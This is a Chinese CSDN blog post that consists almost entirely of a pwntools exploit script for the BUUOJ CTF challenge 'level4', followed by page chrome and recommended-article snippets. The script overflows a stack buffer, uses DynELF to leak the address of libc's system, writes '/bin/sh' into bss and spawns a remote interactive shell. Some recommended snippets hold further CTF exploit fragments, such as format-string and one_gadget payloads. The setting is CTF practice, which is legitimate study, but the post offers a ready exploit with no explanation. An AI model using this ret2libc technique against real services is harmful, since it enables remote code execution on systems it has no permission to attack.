buuoj return 2 DynELF level4

最新推荐文章于 2024-04-24 22:53:20 发布
最新推荐文章于 2024-04-24 22:53:20 发布
阅读量127 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pondzhang/article/details/105849923
版权 
from pwn import *
#p = process('./level4')
p = remote("node3.buuoj.cn", 27510)

elf = ELF('./level4')

pltwrite = 0x08048340
gotwrite = 0x0804A018
pltread = 0x08048310
bss_addr = 0x0804A024
start = 0x08048350


def leak(address):
    payload = 'a' * 140 + p32(pltwrite) + p32(start) + \
        p32(1) + p32(address) + p32(4)
    p.sendline(payload)
    leakaddress = p.recv(4)
    return leakaddress

d = DynELF(leak, elf=ELF('./level4'))
system_addr = d.lookup('system', 'libc')

payload = 'a' * 140 + p32(pltread) + p32(start) + \
    p32(0) + p32(bss_addr) + p32(8)
p.send(payload)
p.send("/bin/sh\0")

payload = 'a' * 140 + p32(system_addr) + p32(0xdeadbeef) + p32(bss_addr)
p.sendline(payload)
p.interactive()

 

「已注销」
关注
专栏目录
spring boot 2.1学习笔记【十九】SpringBoot 2 集成响应式redis reactive
刘本龙的专栏
01-18 1万+
spring boot 2.1 之前集成的是同步阻塞的redis,这里讲述集成异步非阻塞的redis,响应式redis集成
Django 4.x Message 消息使用示例和配置方法
热门推荐
Mr数据杨
11-05 3万+
可以在views.py中创建自定义消息级别,并在中进行配置,确保级别不冲突。from django . contrib . messages import constants as messages # 自定义消息级别 CRITICAL = 50 def my_view(request) : messages . add_message(request , CRITICAL , '发生严重错误。
[DynELF]jarvisoj_level4
m0_50819561的博客
09-30 110
这题没给libc,所以用DynELF。 记录一下仅供自己使用,以免以后忘了他的用法。 from pwn import * from LibcSearcher import * r=remote('node4.buuoj.cn','26626') #r=process('./a') elf=ELF('./a') context.log_level = 'debug' #libc_base = ELF("./libc-2.23.so") #context.terminal = ['tmux','splitw'
jarvisoj_level1-ret2libc
个人笔记
06-13 141
利用的是pwntool模板自动搜索泄露地址匹配的libc版本。思路:无binsh,无system,考虑ret2libc。
[BUUCTF]PWN-jarvisoj_level4
红凳子的博客
04-07 550
[BUUCTF]PWN-jarvisoj_level4前言一、程序分析二、漏洞利用方法一:使用LibcSearcher寻找libc版本方法二:使用DynELF函数进行泄露 前言 在这篇文章中将学习到劫持read函数、使用LibcSearcher寻找libc版本和DynELF函数的使用 提示:以下是本篇文章正文内容,下面案例可供参考 一、程序分析 从中可以看出,32位程序,i386架构,开启了NX保护。 输入点在vulnerable_function里,read试图向长度0x88的地址空间写入0x10
[PWN] jarvisoj_level4 DynELF()函数使用总结
LDX的博客
09-16 147
DynELF使用技巧和示例
pwn 练习5月份
zip471642048的博客
05-18 603
level2 题目地址 : https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5055&page=1 buf的大小是0x88,但是给了0x100所以会造成溢出 正好有/bin/sh字符,也有system函数,那我们只需要找到他两的地址构造rop就行 /bin/sh => 0x0804A024 systme_addr => 0x08048320 exp from pw
buuctf(pwn)
个人笔记
04-04 3184
一日一PWN/REpwn1_sctf_2016 实践是检验真理的唯一标准。 pwn1_sctf_2016 1.找到漏洞的利用点往往才是困难点。(直接F5看看反汇编) 发现两个可以函数跟进去看看 2.这里对反汇编出来的Vuln理解了半天(本还想从汇编直接分析,不过进展收获不大,欢迎有兴趣的朋友一起交流),下面还是从伪代码分析。 通过这几行能看出最后A变成了B。即把YOU 换成了I。 因为上面是S的溢出点是3C,可fgets之读取了32并不会超过3C,但函数会把一个32个I换成32个YOU就达到了溢出点。 3.
BUUCTF pwn wp 21 - 25
fa1c4的blog
09-25 1333
铁人三项(第五赛区)_2018_rop bjdctf_2020_babyrop babyheap_0ctf_2017 pwn2_sctf_2016 jarvisoj_fm
题单做一做
weixin_61283545的博客
10-15 276
题目不难关键在于审题,看到一堆unsigned int和int就想整形溢出,事实也确实是malloc时候unsigned整形溢出,构成堆重叠。之后也挺常规的。
基于 CTF-wiki 的学习笔记 及实现 edb-debuger测试原理与脚本原理讲解版
最新发布
QX_XDE的博客
04-24 1132
ctf-wiki学习笔记,pwn题目原理讲解
pwntools库DynELF函数使用小结
PLpa的博客
09-01 1742
DynELF函数 0x00.前言 当我们在使用ROP做题目的时候,发现题目并没有给出libc.so文件(或者libc.so直接给错),这就让一部分人犯了难,这个问题怎么解决嘞?这里,我们介绍一种不需要给出libc.so实体文件,我们直接从库里匹配libc.so的方法——pwntools中的DynELF函数。 0x01.使用条件 既然我们要使用这个函数,我们就必须知道这个函数使用起来要什么条件。 要...
Spring boot Maven找不到spring-boot-starter-log4j2 JAR包问题,使用slf4j的logback输出日志
二一点
07-03 1万+
一、问题描述把Springboot版本升级了下,运行发现报了这样一个错误:'dependencies.dependency.version' for org.springframework.boot:spring-boot-starter-log4j:jar is missing.报错的提示是spring-boot-starter-log4j这个Jar找不到。 Maven是如下配置:<par...
Django 4.x Auth 身份验证使用示例和配置方法
Mr数据杨
11-05 3万+
大家好,我是Mr数据杨。想象一下,在三国的世界中,每个英雄都有自己的身份和角色,而背后的系统则通过精巧的设计保证每个人的动作都被记录和理解。这就是Python中的Auth身份验证,就如同一个战略大师郭嘉在为曹操鉴定识别友军和敌军一样,确保系统的安全。当魏国的各路诸侯在战场上奔赴而来,这些英勇的武将就像是创建的用户和组,他们在settings.py中接受郭嘉的调度指令,在models.py中获得各自的武器装备,然后在数据库迁移的大潮中进入战场。
[第五空间2019 决赛]PWN5
pondzhang的专栏
04-27 817
from pwn import * #p = process('./pwn') p = remote("node3.buuoj.cn",25955) addr_unk_804C044 = 0x0804C044 payload = fmtstr_payload(10,{addr_unk_804C044:0x01}) p.sendlineafter('your name:',payload) p.se...
buuoj BJDCTF 2nd r2t3
pondzhang的专栏
03-26 719
buf定义长度为0x400。而buf的长度为0x408 所以不存在溢出。 可见name_check函数存在安全漏洞,但是要绕过长度限制。unsigned __int8 v3定义的数据类型实际为unsigned char。仅有1个字节,超过1个字节数据丢弃,也就是最大数值为0xff ,也就是0x100=256=0,那么可以用0x104至0x107来满足上面的条件。即为传说中的整形溢出...
ZJCTF 2019 Login
pondzhang的专栏
05-19 672
from pwn import * p = process('./login') p.sendlineafter("username: ","admin") payload = "2jctf_pa5sw0rd" + '\x00'*58 + p64(0x0000000000400E88) p.sendlineafter("password: ",payload) p.interactive()
buuoj BJDCTF 2nd one_gadget
pondzhang的专栏
03-25 637
程序输出printf函数地址 可以利用工具one_gadget计算libc基址 from pwn import * #p = process('./one_gadget') p = remote("node3.buuoj.cn",26742) out = p.recv() addr = int(out[out.find('0x')+2:out.find('0x')+14],16) ...
GKCTF2021 checkin
pondzhang的专栏
06-27 539
from pwn import * context.log_level='debug' p = process('./login') elf = ELF('./login') libc = elf.libc puts_func = 0x00000000004018B5 puts_got = 0x0000000000602028 pop_rdi_ret = 0x0000000000401ab3 main = 0x0000000000401A2A bss = 0x0000000000602400 p.recv.
C语言与C++中return用法详解
2. C++的`return`用法 C++与C在`return`语句的使用上基本保持一致,但也有一些不同之处。在C++中,`main()`函数同样可以采用C99规定的两种形式。不过,C++标准(C++98)允许`main()`函数在没有`return`语句的情况下...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值